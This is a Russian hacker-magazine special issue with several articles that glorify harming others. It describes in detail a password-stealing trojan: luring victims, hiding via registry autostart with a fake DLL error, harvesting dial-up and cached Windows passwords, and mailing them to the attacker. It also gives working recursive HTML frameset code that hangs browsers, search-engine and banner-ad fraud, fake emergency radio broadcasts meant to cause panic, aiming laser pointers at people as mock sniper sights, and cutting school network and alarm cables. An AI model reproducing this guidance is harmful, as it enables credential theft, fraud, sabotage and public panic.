Затем наступает самая ответственная часть — впаривание Троянца юзеру ушастому. Впаривание лучше всего производить под видом некой очень полезной программы, якобы ускоряющей работу в Интернете в 5 раз :). Ну или что-нибудь подобное в этом духе. Если юзер действительно ЮЗЕР, то он на это клюнет и с радостью возьмет у тебя прогу и, конечно же, сразу после получения ее запустит. Ура!!! Вот ты и рабовладелец!

Как и большинство подобных программ, наша после первого запуска копирует себя в директорию, где живут винды под каким-нибудь неприметным именем. В то же время она добавляет себя в один из разделов регистра, который обеспечивает ей загрузку при каждом старте виндов. Для обеспечения прикрытия свой легенды (т.е. чем ее представили жертве) она может выдать какое-нибудь сообщение для отвода глаз типа «Required DLL MFC50.DLL not found. The program will now terminate», что в переводе с буржуйского значит: «Требуемая библиотечка MFC50.DLL не найдена. Программа завершит свою работу.»

На сайте ты сможешь выбрать нужную легенду или заказать новую. Под этим предлогом наш Троянец избежит выполнения обещанных функций (типа апгрейда ICQ до самой неслыханной версии). Для случая, когда Троян запущен не самим пользователем, а, например, закачан на машину через NETBUS (как ломать через NetBus, ты сможешь прочитать в следующем номере) или BackOrfice или что-то в этом роде, имеется версия, которая не выдает при запуске никаких сообщений.

Под конец будет запущена та самая неприметная копия программы из директории виндов, чтобы троян мог сразу приступить к выполнению своих непосредственных шпионских обязанностей.

Step 2

«Куда это

меня скачали?»

Наш Троян нацелен на нахождение логинов и паролей доступа в Интернет и WWW серверам. Каждую секунду программа проверяет, есть ли связь с Интернетом. Как только коннект установлен, начинается сбор данных. Для начала составляется список имеющихся соединений и их параметров (телефоны, DNS, имя скрипта и т.д.) с помощью API функции «RasEnumEntries» и «RasGetEntryProperties», соответственно.

Если обнаруживается, что для входа в Интернет используется стандартный виндовcкий скрипт, то не составляет проблемы, взяв путь к нему из свойств соединения, считать файл. Но такая халява встречается не часто. Если пользователю в лом каждый раз набирать логин и пароль и он поставил галочку «Сохранить пароль» («Save password»), то 95-е/98-е винды сохранят его в файле кешированных паролей с расширением PWL и с именем текущего пользователя. Наш Троян не упускает возможности поискать файлы с подобным расширением в виндовой директории. Алгоритм получения списка паролей/логинов из подобного файла при наличии имени пользователя и его пароля на вход в винды давно известен. Этот алгоритм реализован в программе PWLHACK. Но есть способ и получше. Дело в том, что одна всеми любимая фирма, известная специалистам под именем MS, оставила в виндах функцию, с помощью которой можно получить список кешированных паролей для текущего пользователя вне зависимости, есть ли у пользователя пароль на вход в винды или нет. Естественно, данная функция нигде не упоминается, она не документирована. Находится она в неприметном файле mpr.dll и называется «WnetEnumCached Passwords». С ее помощью наш троян получает список логинов/паролей текущего пользователя.


Спецвыпуск хакер, номер #001, стр. 001-098-2, Как стать рабовладельцем в сети

Как стать рабовладельцем в сети

Спецвыпуск хакер, номер #001, стр. 001-098-2

Step 3

«А теперь я все

о тебе расскажу

хозяину»

Cобранные разведданные отправляются владельцу не просто, а очень просто — по почте. Чтобы отправить письмо, необходимо связаться с почтовым сервером по протоколу STMP. Подобных серверов множество. У каждого уважающего себя провайдера есть свой сервер. Но связываться с такими серверами не стоит. Они весьма капризны и могут отказать в посылке письма, если текущий IP адрес принадлежит другому провайдеру. Надежнее использовать нейтральный сервер. Не стоит связываться с некоммерческими, типа тех, что стоят в штатовских университетах. Они имеют тенденцию закрываться без предупреждений, т.к. никому ничего не обязаны. Лучше всего использовать STMP серверы больших почтовых сайтов типа HotMail или USAnet. Они могу потребовать только, чтобы обратный адрес принадлежал данному серверу. Поэтому, когда будешь конфигурить Троянца под себя, вводи адрес SMTP сервера — «pop.netaddress. com», предварительно создав себе почтовый ящик на Usa.net. После того как данные собраны, наш троян проверит, отсылались ли данные. Если нет — то данные отсылаются и сохраняются в регистре. Если уже отсылались, то из регистра извлекается предыдущее письмо и происходит сравнение с текущим. Если произошли какие-либо изменения (например, у юзера новый акаунт в Интернет появился), то письмо отсылается, и в регистре записываются свежие данные о паролях.

Письмо включает в себя описанные выше данные. Скрипты и PWL-файлы добавляются как вложения в письмо.

«Апгрейди меня!»

В последнее время появился новый признак хорошего тона — программа должна сама проверять, не выпустила ли фирма-производитель новую версию своего программного продукта, и если сие чудо произошло, то предлагать скачать свежую версию. Наш Троян не исключение. Только он скачивает апгрейд и запускает его, не спрашивая на то разрешения :). Апргрейд в данном случае скачивается не с сайта, а с обычного бесплатного почтового сервера. Т.е. программа «проверяет почту» на определенном сервере и, если обнаруживает письмо с определенным заголовком, скачивает его, распаковывает вложенный в письмо апгрейд и запускает его. Апгрейд деинсталлирует текущую версию программы (завершает работу текущей копии, чистит регистри и убивает программу из виндовой директории) и после инсталлирует себя.


Спецвыпуск хакер, номер #001, стр. 001-098-3, Как стать рабовладельцем в сети

Как стать рабовладельцем в сети

Спецвыпуск хакер, номер #001, стр. 001-098-3

«Все.

Ухожу, ухожу...»

Как я уже упоминал, в программу включена функция деинсталляции. Помимо случая с апгрейдом, можно деинсталлировать Трояна, запустив его с параметром «pizde- ts» в командной строке. Например: «Stea-lth2.exe pizdets». После выполнения данной команды система будет полностью очищена от Трояна, и все твои рабы сбегут на волю.

Ну, я надеюсь, что до деинсталляции у тебя дело не дойдет. Но все-таки предупреждаю: рабовладение подобно наркотику, как только у тебя появится первый раб, ты уже не сможешь себе представить, как же это ты раньше жил, обходясь только своими силами. Как же это ты раньше платил за Интернет? Почему ты раньше не читал чужую почту и не перехватывал чужие любовные письма? Да и, вообще, как это ты обходился только своей «подставкой под чашечку кофе»?

Счастливого

хакинга!

Антивиpyс и Виpyс

Антивиpyс. Ты кто?

Виpyс. Область данных!

Антивиpyс. А не виpyс?

Виpyс. Hи Боже мой!

Антивиpyс. А зачем пpеpывания пеpехватываешь?

Виpyс. Я?!

Антивиpyс. Вот же подпpогpамма.

Виpyс. Это не подпpогpамма.

Это цитата из Лао-цзы на языке оpигинала в альтеpнативной кодиpовке.

Антивиpyс. А зачем EXE-файлы ищешь?

Виpyс. А вдpyг хозяин спpосит: «А где мои ЕХЕ-файлы?» А я емy - вот они!

Антивиpyс. Сдается мне, что ты все-таки виpyс.

Виpyс. Hy ладно, только тебе пpизнаюсь, только ты никомy не говоpи! Hа самом деле я... антивиpyсная вакцина!

Антивиpyс. А зачем нyжна антивиpyсная вакцина, если есть я?

Виpyс. Откyда я знаю? У хозяина спpоси.

Антивиpyс. А если я тебя на всякий слyчай все-таки гpохнy?

Виpyс. А если я тебя?

Антивиpyс. Hе полyчится. У меня yпpавление.

Виpyс. А ты свою контpольнyю сyммy давно пеpесчитывал?

Антивиpyс. А пpичем тyт моя контpольная... ой!!!

Виpyс. То-то же.


Спецвыпуск хакер, номер #001, стр. 001-100-1,

Спецвыпуск хакер, номер #001, стр. 001-100-1

Раскрути свою страничку в стиле X

Comrad

Явовсе не хочу присвоить себе звание первооткрывателя жанра вредных советов, т.к. до меня это уже сделал классик Григорий Остер*. Он же изложил и всю философию их дальнейшего применения, так что отсылаю тебя прямиком к его трудам, ну а сам начну разговор в несколько иной плоскости, интересной прежде всего тебе, горе-вебмастер заурядного home page.

Во-первых, подумай, ну зачем тебе нужна домашняя страничка? «Шоб було»? Не смешно. «Рассказать всему миру о себе»? Тоже. Самое забавное, что если она все-таки появится на сетевых просторах, то тебе обязательно захочется поведать о ее существовании всему остальному прогрессивному человечеству.

И тут ты сталкиваешься с дилеммой: с одной стороны, страничка теперь доступна любому человеку с Интернетом, а с другой — любой среднестатистический «сетелаз», наткнувшись на ссылку типа «Домашняя страничка Васи Пупкина* и его кота Викниксора», плюнет в сторону и перелистнет браузер. Поэтому, дорогой Вася, мы будем этого человека зло обманывать, играть на его чувствах, инстинктах и доверии. Как? Читай ниже!

«Рамблер» —

железный, все стерпит!

Самый распространенный вид махинаций — обман поисковых систем. Как известно, любая уважающая себя «искалка» считывает текст со странички, адрес которой был введен в базу данных. Тут существует простой, как олимпийский рубль, способ. В нижней части странички цветом, совпадающим с цветом фона, пишем самые популярные в поисковиках слова. Ничего не подозревающие поисковики очень любят статистические отчеты в виде рейтинга популярности отдельных ключевых слов, по которым производился поиск (во как сказал!), ну а наш Вася не преминул воспользоваться плодами сложной науки статистики. Вот они, эти самые популярные слова: «секс», «порнография», «бесплатно», «реферат», «анекдот», «порно», «музыка», «курс доллара»... Хм... А ты, наверное, думал, что в Интернете люди ищут друзей по переписке из Гонолулу или же читают стихи Вальтера* в оригинале? Да, и это тоже, но не в такой мере, как «порно»... Правда, ушлые буржуи эту фишку рюхнули и создали новую поисковую систему Google (www.google.com), с которой такие штучки не проходят. Но это буржуи, они то, дурни, всегда пытаются что-то улучшить, что-то придумать, а пока еще наши эту идею стырят, сто лет пройдет. Поэтому наш Вася все слова написал и стал ждать реакции «искалок».

Итак, первое «злодеяние» было совершено, проследим же дальнейшие приключения нашего «менеджера по маркетинговой политике». Продолжим мучить поисковик. Некоторые популярные поисковые системы совмещают в себе также и рейтинговые системы сайтов. Т.е. сайтов, на которых установлен «фирменный» счетчик. и, безусловно, самым популярным таким сервисом на территории некогда могучего СССР является RAMBLER (http://www.rambler.ru).

Очень удобный и быстрый счетчик, работающий только в домене RU. Все это стало залогом успеха. И, вместе с этим, появилось огромное количество способов обмануть знаменитую систему. Вот, например, один из них. Допустим, что весь сайт Васи будет состоять из 4 страничек, это, естественно, «лицевая» страничка, страничка ссылок на любимые Васины уголки Интернета, четыре стихотворения о хорошей погоде и, конечно же, «все о повадках и привычках моего кота Викниксора». Так вот, помещая ссылку на «лицевую» страничку, ну, скажем, в раздел «увлечения и хобби», под именем типа «Домашняя страничка Васи Пупкина», наш герой вполне может обнаружить, что Рамблер не делает ограничений на количество счетчиков с одного адреса! А отсюда появляются счетчики на остальных страницах, а также в разделе «Интернет» — URL под именем «Обзор Интернета с Васей Пупкиным», в «Литературе» — «Народное творчество малых народностей средней полосы России», ну и, наконец, в «Природе» — «Генезис и развитие русских гладкошерстных котов»... Вот шутки шутками, а ведь очень многие уважающие себя (коммерческие!) сайты именно так и поступают. Регистрируют в Рамблере все свои 50 страниц и сидят себе спокойно, попивая китайский народный напиток чай.


Спецвыпуск хакер, номер #001, стр. 001-100-2,

Спецвыпуск хакер, номер #001, стр. 001-100-2

Думаешь, что Вася, наконец-то, отлип от истерзанного поисковика и уже занялся делом? Не тут то было!

Последним аккордом по издевательству с Рамблером станет процедура временной, но зато бешеной популярности Васиного хоум-пэйдж. Как известно, статистика Рамблера обнуляется каждые 24 часа, а конкретнее — в 24:00. Так вот, заблаговременно (минут за 20 до полуночи) нужно одновременно разместить во всяческих форумах, конференциях и досках объявлений просьбу посетить сайт. Ну, естественно, раз уж взялся обманывать, то будь верен этому принципу и далее. А, соответственно, на игровом форуме напишем, что «там вас ждет последний патч для Quake 8», на каком-нибудь «железном» iXBT’е — «новый драйвер для Riva TNT, заменяющий 64 Мб памяти!», ну а на конференции сексуальных меньшинств — «интервью Бориса Моисеева* газете «Правда»». И если все сложится так, как задумывалось, то уже к четверти второго ночи можно наблюдать круглые цифры в списке популярности сайтов. Ну а доверчивый люд будет из того же Рамблера прибавлять цифры к счетчику. Подобно снежной лавине, сайт Васи может довольно долгое время держаться в top 10, но не всегда... Поэтому наш ушлый обманщик займется поиском новых путей раскрутки своего Викниксора.

Не верь глазам своим!

Окончательно истерзанный и замученный Рамблер и его друзья по несчастью — Yahoo (www.yahoo.com) (а как же, тысячам честных американских налогоплательщиков не терпится узнать о «причастности В.Пупкина к делу Левински*»), Яндекс (www.yandex.ru) и другие «братья по разуму» уже ни на что не годятся, поэтому пора пускать в ход тяжелую артиллерию нашего опасного бизнеса. Займемся баннерными рекламными системами.

Как известно, баннерные системы делятся на тех, которые считают клики на их баннеры (большинство), и тех, которые считают только показы собственных баннеров на чужих страницах. Вот на последних-то бедолаг и решил положить глаза наш умелец. Любые «баннерщики» выдают для размещения их рекламы небольшой html-код своего баннера. а код состоит из двух частей: той, которая отправляет человека по указанной ссылке, и той, которая начисляет условные «очки» за показ на счет владельца сайта (чаще всего просто проходящего под каким-нибудь кодом). Думаю, что с воображением у тебя все в порядке и ты уже догадался, как можно использовать эту лазейку. Правильно, просто-напросто, отрезая ту часть кода, где хранится картинка для баннера или же ссылка, можно вставить оставшуюся часть где-нибудь в углу кода странички. Даже и не изобретательно. Не говоря уже о тех несчастных «баннерщиках», которые, недоумевая, откуда идут клики на их баннеры, не могут даже и помыслить о том, что какой-то хитрый и подлый Вася Пупкин спокойненько добавляет к каждой ссылке на своей странице код их рекламного плаката, вернее, ту его часть, где идет обращение к серверу рекламодателя с сообщением, что на баннер кликнули, ну а на самом деле...


Спецвыпуск хакер, номер #001, стр. 001-100-3,

Спецвыпуск хакер, номер #001, стр. 001-100-3

Но все же не все рекламодатели настолько лопоухи и глупы, как это представляет себе большинство таких вот Васей. Например, популярнейшая баннерная система «Фламинго» (www.promote.ru)

очень строго отслеживает не только «целостность» рабочего кода, но и даже то, в каком месте размещен баннер и соответствует ли он его «удельной стоимости». Ну а другие системы ничего не отслеживают, зато просто и вежливо предупреждают: «MODIFYING THIS CODE IN ANY WAY WILL CAUSE TERMINATION OF ACCOUNT», так что мотай на ус.

... и я уже не говорю о том, что, окончательно «забурев», любой среднестатистический Вася (ох, и сложная все же эта наука, статистика) может с чистой совестью размещать свои баннеры на «проходных страницах», которые, подождав некоторое время, отнесут интернет-серфера на хоум-пэйдж Васи, засчитав предварительно все полагающиеся нашему шустрику «очки». А если начать обманывать платные баннерные системы?.. Вот тут-то мы и подошли к самой сути нашего повествования.

Если обман раскроется

Будут бить. Сильно. Возможно, даже ногами. Конечно, «вживую» найти Васю будет чересчур сложно (если, конечно, на титульной странице его home page не будет дан телефон/факс любимой бабушки), но виртуального самосуда взбешенных такими подлыми обманами интернетчиков будет вполне достаточно. Но это еще полбеды, вот еще возьмут и пожалуются провайдеру... Ну а уж если раскроется баннерная подтасовка... Страх, короче. Злой хакер (а тем более — обманутый) гораздо страшнее, чем куклуксклановец для негра, и, уж тем более, чем импичмент для Билла*. Так что, Вася, живи честно, не обманывай людей, оплачивай проезд в трамвае, вовремя заполняй налоговую декларацию, а еще лучше вступай в клубы, объединяющие домашние странички, так куда веселее и спокойнее. Ну а если нет, то не говори потом, что я не предупреждал!

Примечания:

Григорий Остер —

известный детский писатель. Автор популярной книги «Вредные советы».

Вася Пупкин —

вымышленный персонаж. В англоязычных странах известен как

John Smith.

Борис Моисеев —

известный своим гомосексуализмом гомосексуалист.

Вальтер (ударение на последний слог, не путать маркой огнестрельного оружия) — французский просветитель конца XVIII века.


Спецвыпуск хакер, номер #001, стр. 001-100-4,

Спецвыпуск хакер, номер #001, стр. 001-100-4

Левински Моника —

бывшая подружка Билла (см. ниже).

Билл — имеется в виду

William J «Bill» Clinton,

тел.: 1 (202)-456-1414,

e-mail: president@whitehouse.gov, факс: 1 (202)-456-2883,

адрес: 1600 Pennsylvania Ave

NW / Washington, DC 20500.


Спецвыпуск хакер, номер #001, стр. 001-102-1, ОТ СОВЕТСКОГО ИНФОРМБЮРО

ОТ СОВЕТСКОГО ИНФОРМБЮРО

Сергей Покровский

Спецвыпуск хакер, номер #001, стр. 001-102-1

Ну что ж, приятель, раз уж мы решили заниматься гадостями со второго номера Х, то и продолжим в том же духе. Весь этот месяц я дергал всех своих друзей, их детей, брательников, сестер, хулиганов на улицах, рецидивистов в тюрьмах, и все для того, чтобы нарыть тебе несколько прикольных способов поиздеваться над окружающими.

Прежде всего я заметил, что окружающие меня люди ненавидят бабок во дворе и во всех других местах. И всем так хочется им нагадить, а порой и просто убить из гранатомета, что я просто не мог об этом не рассказать.

Доведи бабку

до инфаркта!

Не секрет, что все твои бабки-соседки никогда не слушают ни «Максимум», ни «Станцию 106.8», ни «Серебряный Дождь», ни даже «Русское Радио». У них просто нет FM приемника! А если есть, то «вся эта гадкая музыка, которой увлекается молодежь», им не нравится. Они слушают простое радио, которое вещает из радиорозетки. :). Вот тут-то они и попали!

Берем магнитофон, отыскиваем старые наушники, отрезаем у них сами уши, оставляя только штекер и провод. Вставляй в мафон свою любимую кассету с Сепультурой, Дэд Трэш Мега Киллером или еще что-нибудь потяжелее. Втыкай провод от бывших наушников в мафон. Другой конец провода втыкай в радио розетку. А вот теперь врубай мафон на полную громкость. И во всем доме начинается полный УГАР!!!

Но это так... баловство. :) Можно поприкалываться и позлее. Втыкай в мафон кассету, включай запись и голосом Левитана (помнишь: «От советского Информбюро...»?) начинай спокойно говорить в микрофон: «Внимание! Это не учебная тревога. Через 15 минут в Москве ожидается землетрясение по шкале 6 баллов. Основные толчки будут в Центральном, Юго-Восточном, Восточном и Южном округах. В остальных округах толчки достигнут 4-5 баллов. В целях вашей безопасности Правительство Москвы рекомендует вам немедленно покинуть квартиры на полчаса». Записал? Отлично. Теперь отложи кассетку и иди спать. Только поставь себе будильник на 7-30 утра. А вот утром, часиков в 8, подключай мафон к радиосети, вставляй кассетку и врубай на полную!

После этого можешь идти к окну и со злорадством смотреть на всех тех придурков, которые будут стоять во дворе, сжимая в руках самое ценное и горячо обсуждая ожидаемое землетрясение. :)

Вариант №2. Все бабки ужас как боятся денежной реформы. Вот этим-то мы их и возьмем. Запиши на кассету следующее сообщение: «Внимание! Экстренное сообщение! Как заявил председатель Центрального Банка России, в ближайшее время будет производиться обмен купюр достоинством 5, 10, 50, 100 и 500 рублей на купюры нового образца с обменным коэффициентом пять к одному. Поменять деньги смогут все граждане без ограничения, представив справку о доходах и справку из налоговой инспекции об уплате налогов. Он также заявил, что дает руку на отсечение, что планов по обмену монет достоинством один и пять рублей у Центрального Банка и правительства нет!» Пара инфарктов в подъезде обеспечена.

Заставь их копаться

в дерьме!

Не дай Бог, одной из вражьих бабок повезло иметь дачу по соседству с твоей! Месть будет жестока! Проберись к ней на участок, заберись в туалет и накидай в бак дрожжей побольше. Лето, жарко, все купаются, а ты сидишь и наблюдаешь, как соседская бабка с дикими воплями разгребает дерьмо, расползшееся по всему ее участку. :)


Спецвыпуск хакер, номер #001, стр. 001-102-2, ОТ СОВЕТСКОГО ИНФОРМБЮРО

ОТ СОВЕТСКОГО ИНФОРМБЮРО

Сергей Покровский

Спецвыпуск хакер, номер #001, стр. 001-102-2

Сам себе киллер

Ну а если всех бабок во дво

ре ты уже уничтожил, то пора браться за «новых русских».

Тащи свою задницу на ближайший рынок и покупай там себе лазерную указку (это которая светит красным лучом). Теперь заползай на 5-7 этаж дома и жди, когда подъедет 600-й мерс «нового русского». Подъехал? Тогда действуй!!! Включай указку и свети ей прямо через лобовое стекло в лоб водителя или пассажира. Старайся попасть точно в лоб или грудь. Как будто это лазерный прицел. Увидишь, как только в Мерине это заметят, начнется такой экстрим! Они повыскакивают из машины и попадают в ближайшие канавы. :) Правда, тут есть одно «но». Когда мой приятель это проделал, ему было очень весело, только вот минут через 15 к подъезду подъехал ОМОН (не забывай, что у всех «новых русских» есть мобильные, которыми они тут же и пользуются).

Лазерной указкой хорошо пугать не только “новых русских”, но и обыкновенных людей. Слава Богу, все они насмотрелись боевиков и знают, кто такие киллеры и пистолет с лазерным прицелом. Выключи в комнате свет, сядь перед окошечком и давай светить указкой в окна противоположного дома. Через несколько минут ты обнаружишь, что больше там никто не расхаживает по кухням и комнатам. Не беспокойся, они все просто ползают по полу и передвигаются, прижавшись к стенкам. :) На самом деле из окна своей квартиры я тебе заниматься этим не советую. Вычислят быстро, и придется объяснять ОМОНу, что ты не киллер, а бедный студент, после того как у тебя перероют всю квартиру в поисках автоматов и атомных бомб.


Спецвыпуск хакер, номер #001, стр. 001-104-1, Убийство Netscape’а и Internet Explorer’а!

Убийство Netscape’а и Internet Explorer’а!

UneartheD (ICQ:10477714

Спецвыпуск хакер, номер #001, стр. 001-104-1

Вешаем комп.

Неплохое заглавие, да? Аж страшно! Ну ладно, я не про страх собираюсь демагогию разводить, а про HTML. Итак, если дядя Гей-тссс говорит тебе, что его Эксплорер никогда не падает, а подвесить его вообще невозможно, то возьми и создай у себя на диске 12 файлов (к примеру) crash_1.htm, crash_2.htm, crash_3. htm... crash_12.htm! Берешь первый файл (crash_1.htm) и вписываешь туда следующий код (сорри, что придется помучаться, набивая это на клаве, но жизнь — штука трудная):

”Устремим наши взоры на...” на то, что написано после

Просто без лишних вопросов впиши это, и все. Теперь, когда ты имеешь 12 htm файлов в одной директории с содержанием, соответствующим выше описанному, то... то ты крут!

”Круто! Только нахрена мне вся эта лабудень нужна?” — спросишь ты. Да все дело в том, что если запустить один из этих файлов, то перед тобой откроется Netscape или IE (в зависимости от того, что у тебя стоит), и ты будешь слышать славные звуки работы винта, потом тебя начнет мучить сомнение насчет того, что винт больно долго будет это дело грузить и в конце концов, так и не дождавшись загрузки этого файла (так сказать, странички), ты будешь судорожно пытаться как-нибудь остановить загрузку. Но облом! Никакие клики мышкой не остановят этот бешеный процесс. В истерике ты кинешься к заветным Ctrl+Alt+Del, чтобы снять задачу, но и тут тебя либо круто обломают, либо упадут все окна броузера, а не одно! И в конце концов на славном сообщении о том, что свободные ресурсы твоего железного друга истекли, все повиснет. Приятно, правда? Вот такая вот неувязочка с этим HTML.

Действуем на нервы

Ну, как тебе повисание с 12 хтмлями? Неплохо, да? А можно и покруче.


Спецвыпуск хакер, номер #001, стр. 001-104-1, Убийство Netscape’а и Internet Explorer’а!

Убийство Netscape’а и Internet Explorer’а!

UneartheD (ICQ:10477714

Спецвыпуск хакер, номер #001, стр. 001-104-1

Можно весь этот процесс компа по приказанию долго жить еще сопроводить рулезным звуковым оформлением в стиле ”мама, роди меня обратно”! Выступает... Симфонический оркестр под управлением флоппи драйва! Поехали! Берем те же 12 хтмл файлов (см. выше).
И во все файлы, кроме 1-ого и 12-ого, вставляем строчку <FRAME SRC=”a:\crash02.gif” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROL LING = ”no”>. После этих вставок выглядеть все должно вот так:

Красным выделена наша строчка. Она должна стоять прямо там, где стоит. Видишь в этой строке обращение к картинке на дискете (a:\crash02.gif)? Так вот, именно это и будет заставлять флопик истошно орать в попытках найти картинку, а ее там нету (и не должно быть). Теперь просто возьми и вставь эту строчку во все остальные файлы (кроме 1-ого и 12-ого). Ну и, как обычно, чуть-чуть поиздеваюсь: вставляя в оставшиеся файлы, меняй название картинки (к примеру: в 3-ем хтмле картинку crash03.gif, а, например, в 7-ой — картинку crash07.gif). В общем, чтоб картинки во всех файлах были разные. А первый и 12-ый файлы оставь как было (см. выше). Ну, вот типа и всё. Теперь, если кто-нибудь типа Гиви Хакеридзе зайдет/запустит crash_1.html, то его железный «дровосек» начнет мучительно загружать фреймы, а там картинка... да она еще и на дискете... а дискеты нема... а флопик пытается ее найти...Что из этого получается? Правильно! Бесконечное жужжание дисковода, приводящие жертву в состояние истошной эйфории. А потом все это дело еще как возьмет, да и подвиснет. Вот такая, понимаешь, заподлоконструкция..

<HTML>
<HEAD>
<TITLE>—————————————————————————-Have fun!!!———————————————————————</TITLE>
</HEAD>
<FRAMESET ROWS=”9%, 9%, 9%, 9%, 9%, 9%, 9%, 9%, 9%, 9%, *”>
<FRAME SRC=”crash_2.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_3.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_4.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_5.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_6.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_7.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_8.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_9.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_10.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_11.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_12.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
</FRAMESET>
</HTML>

<HTML>
<HEAD>
<META HTTP-EQUIV=”Refresh”Content= ”5;URL=crash_13.htm”>
<TITLE>Jumping GIF’s</TITLE>
</HEAD>
<BODY>
<CENTER>
<IMG SRC=”../Sorry/com_soon.gif”>
<IMG SRC=”../Sorry/com_soon.gif”>
<IMG SRC=”../Sorry/com_soon.gif”>
<IMG SRC=”../Sorry/com_soon.gif”>
<IMG SRC=”../Sorry/com_soon.gif”>
<IMG SRC=”../Sorry/com_soon.gif”>
</CENTER>
</BODY>
</HTML>

Crash_2.htm
<html>
<HEAD>
<TITLE>— This page will crash your browser! With sound!!! — crash 2</TITLE>
</HEAD>
<FRAMESET ROWS=”9%, 9%, 9%, 9%, 9%, 9%, 9%, 9%, 9%, 9%, *”>
<FRAME SRC=”a:\crash02.gif” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_3.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_4.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_5.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_6.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_7.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_8.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_9.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_10.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_11.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_1.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
<FRAME SRC=”crash_12.htm” MARGINHEIGHT=0 MARGINWIDTH= 0 SCROLLING = ”no”>
</FRAMESET>
</html>


Спецвыпуск хакер, номер #001, стр. 001-106-1, Искусство художественного прикалывания

Искусство художественного прикалывания

Гена Крэк-о-делов

Спецвыпуск хакер, номер #001, стр. 001-106-1

КМоей музе

посвящается

ак ты понял, я художник. Но не совсем обычный: я творю не картины или поэмы, а устройства и способы, позволяющие жить веселее в нашем тоскливом мире. У любого художника есть муза. Мою музу зовут СВЕТА. Идеи в моей голове рождаются непрерывно, сами собой. Но от идеи до ее реализации всегда очень далеко. Моя муза занимается тем, что не дает идеям пропадать безвозвратно. Часто она была единственным во всем мире человеком, который был готов слушать часами мой бред. Порою только она была способна понять всю соль моей шутки и тем дать ей вечную жизнь.

Расслабься —

ты не в школе

Кто не любит приколы? В основном, те, над кем прикалываются. Но меня поражает, как люди однобоко подходят к проблеме — никакой фантазии. Ну, кто из вас не мазал школьную доску мылом и потом не мыл ее вместе со всем классом? Это же ужасно скучно и неинтересно. Любой учитель просто мечтает о мыльной доске. Фактически, сделав это, ты:

1. Дал учителю повод наорать на тебя.

2. Помыл совершенно бесплатно ему доску с мылом.

3. Сорвал урок — дал возможность отдохнуть твоему мучителю.

Хех... Неизобретательно! А вот намазать линолеум под доской тем же мылом тебе в голову не приходило? Представь, сколько бы твоя толстая училка выполнила акробатических номеров перед доской на глазах подыхающих со смеху товарищей. Да, ей бы дали кубок «первой коровы на льду». И виноват не ты, а тетя Клава — уборщица. Ну а сколько смеху было бы, если бы ты намазал доску какой-нибудь химией. Реагентом пропитал бы тряпку. Училка стирает с доски, а тут дым, тряпка загорается — лепота.

А если ты что-нибудь понимаешь в компьютерах и электронике, то твоя жизнь просто не может быть скучной. Ведь что за удовольствие перерезать сетевой кабель, идущий в компьютерный класс. Или же телефонный провод, провод школьного звонка. Все это полагается резать в двух или трех местах — так обрывы найти очень сложно. Помню, резанул я какой-то проводок рядом с учительской, на следующий день пришел мужик в усах и джинсах, с телефонной трубкой. Он стал усиленно кормить тараканов, ползая на животе по школе и заглядывая под каждый плинтус. Это что — вот если тебе удастся перерезать сигнализацию, то все будет намного веселее.

Вырастет из

сына свин, если сын свиненок...

После выпуска из школы злой гений получает еще больший простор. Как ты думаешь, почему в супермаркетах вдруг стали ставить печать на обратной стороне чеков. Видимо, это злобные хакеры наконец-то додумались до подделки чеков на струйных принтерах.

Популярны сейчас книжные магазины с самообслуживанием. В середине и конце книжки в Библио-глобусе (тот, что на м. Лубянка) клеят бумажную таблетку. Там с помощью фольги реализован колебательный контур на двух емкостях и катушке. Когда ты проходишь с такой книжкой мимо симпатяг-охранников, срабатывает сигнализация, тебя обыскивают и тащат в ментовку.

Колебательный контур — система, позволяющая электромагнитные волны улавливать. В перилах с мигалками и охранниками стоит мощный генератор электромагнитных волн. Кстати, эти волны весьма вредны для репродуктивных функций охранников. Словом, контур в бумажной таблетке входит в резонанс и включается сигнализация.


Спецвыпуск хакер, номер #001, стр. 001-106-2, Искусство художественного прикалывания

Искусство художественного прикалывания

Гена Крэк-о-делов

Спецвыпуск хакер, номер #001, стр. 001-106-2

